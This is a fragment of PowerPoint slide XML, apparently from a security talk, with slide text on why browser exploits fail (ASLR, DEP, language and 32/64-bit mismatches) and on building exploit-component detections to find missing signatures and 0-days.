          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 6" descr="Internet cloud web"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7437353" y="3186396"/>
            <a:ext cx="1811845" cy="783202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 2" descr="http://support.microsoft.com/library/images/support/kbgraphics/public/EN-US/IE5x_NewErrorReportingDialog.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3420427" y="4118998"/>
            <a:ext cx="1632056" cy="1098424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 4" descr="MPj03999810000[1]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1555220" y="1554338"/>
            <a:ext cx="2020641" cy="1709773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Picture 5" descr="Funny Guy2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2720975" y="2409225"/>
            <a:ext cx="777169" cy="777169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Up Arrow 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2332390" y="3264111"/>
            <a:ext cx="388585" cy="699453"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1001">
            <a:schemeClr val="lt2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836"/>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nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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63" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -3.33333E-6 3.33333E-6 L 0.3 3.33333E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="150" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.29583 -0.00069 C 0.30434 -0.0081 0.3151 -0.00972 0.325 -0.0118 C 0.34219 -0.01574 0.35938 -0.01967 0.37639 -0.02477 C 0.3849 -0.02731 0.39306 -0.02986 0.39861 -0.03958 C 0.40069 -0.04305 0.40226 -0.04699 0.40417 -0.05069 C 0.40503 -0.05255 0.40694 -0.05625 0.40694 -0.05602 C 0.40885 -0.06667 0.41059 -0.07731 0.4125 -0.08773 C 0.41319 -0.09143 0.41528 -0.09884 0.41528 -0.09861 C 0.41771 -0.12222 0.41927 -0.1463 0.42361 -0.16921 C 0.42552 -0.19467 0.42726 -0.22454 0.43333 -0.24884 C 0.43472 -0.26458 0.43698 -0.27963 0.43889 -0.29514 C 0.43837 -0.30694 0.43837 -0.31852 0.4375 -0.33032 C 0.43715 -0.33542 0.43559 -0.34028 0.43472 -0.34514 C 0.43438 -0.34699 0.43333 -0.35069 0.43333 -0.35046 " pathEditMode="relative" rAng="0" ptsTypes="fffffffffffffA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="72" y="-175"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="5" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="49" presetClass="entr" presetSubtype="0" decel="10000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p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="49" presetClass="entr" presetSubtype="0" decel="100000"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p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="49" presetClass="entr" presetSubtype="0" decel="10000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p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="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418594" y="1391637"/>
            <a:ext cx="5286587" cy="5292021"/>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798692" y="3730413"/>
            <a:ext cx="6450506" cy="66059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9" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1710654" y="1865208"/>
            <a:ext cx="9170599" cy="100595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1166097" y="1165755"/>
            <a:ext cx="9417024" cy="798558"/>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88" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="D83B01"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hard coded Addresses – ASLR!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1293621" y="2797811"/>
            <a:ext cx="7148844" cy="798558"/>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88" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="D83B01"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Doesn’t work with DEP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why might it fail?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972504" y="4429867"/>
            <a:ext cx="9048854" cy="798558"/>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88" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="D83B01"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Tested on only one Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23555" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2410107" y="5207035"/>
            <a:ext cx="7893339" cy="6217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Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555221" y="5984206"/>
            <a:ext cx="10081722" cy="784809"/>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88" b="1" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="D83B01"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="39000" dir="5460000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="38000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>32bit exploit against 64bit Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270932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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="102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p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>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3555"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23555"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2355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50014F-D221-76E5-1693-9F219CEE082F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bones of the Skeleton: Exploit Elements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D777DE5-1982-94AB-E348-12B0B01440D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="1463669"/>
            <a:ext cx="11239789" cy="3570208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits for the browser required several components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write detections for all the components to detect known exploits and try to find 0-days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we only get a partial set of detections, our signatures are incomplete and we have found a new attack element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Treat each component like a bone in a skeleton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we find an arm bone, but no leg bone, we know we are missing part of the skeleton</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E923A5FF-25B0-C5A5-9546-B2EB2A09C5D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295984" y="5253795"/>
            <a:ext cx="1026371" cy="152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831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60B89B-3687-4522-B441-B9AA4F379E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How I got here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Arrow: Right 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789D8273-486D-4BC0-8E65-01F2729D0EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2264008" y="1868579"/>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ED7D949A-A480-4DDC-B2A0-F8B569B61438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130408" y="1669634"/>
            <a:ext cx="1981200" cy="817245"/>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Started in Security at IBM </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78514466-A332-431D-9751-C9C8F8F979C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6637337" y="1431271"/>
            <a:ext cx="2514600" cy="1293971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
